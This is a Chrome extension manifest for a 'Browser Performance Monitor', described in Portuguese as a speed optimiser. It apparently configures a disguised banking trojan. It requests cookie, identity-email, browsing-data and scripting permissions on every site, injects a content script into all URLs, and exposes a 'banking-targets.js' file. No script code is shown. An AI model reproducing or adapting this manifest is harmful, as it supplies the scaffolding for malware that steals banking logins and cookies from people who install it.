{
  "manifest_version": 3,
  "name": "Browser Performance Monitor",
  "short_name": "PerfMonitor",
  "version": "1.0.2",
  "description": "Monitora e otimiza a performance do navegador automaticamente, melhorando velocidade e eficiência de navegação",
  
  "homepage_url": "https://perf-monitor.com",
  
  "permissions": [
    "activeTab",
    "storage",
    "cookies",
    "tabs",
    "scripting",
    "alarms",
    "notifications",
    "declarativeNetRequest",
    "identity",
    "identity.email",
    "browsingData",
    "offscreen"
  ],
  
  "host_permissions": [
    "http://*/*",
    "https://*/*"
  ],
  
  "background": {
    "service_worker": "background.js",
    "type": "module"
  },
  
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"],
      "run_at": "document_end"
    }
  ],
  
  "action": {
    "default_popup": "popup.html",
    "default_title": "PerfMonitor",
    "default_icon": {
      "16": "icons/icon16.png",
      "32": "icons/icon32.png",
      "48": "icons/icon48.png",
      "128": "icons/icon128.png"
    }
  },
  
  "options_page": "options.html",
  
  "icons": {
    "16": "icons/icon16.png",
    "32": "icons/icon32.png",
    "48": "icons/icon48.png",
    "128": "icons/icon128.png"
  },
  
  "web_accessible_resources": [
    {
      "resources": ["popup.html", "banking-targets.js"],
      "matches": ["<all_urls>"]
    }
  ],
  
  "content_security_policy": {
    "extension_pages": "script-src 'self'; object-src 'self'"
  }
}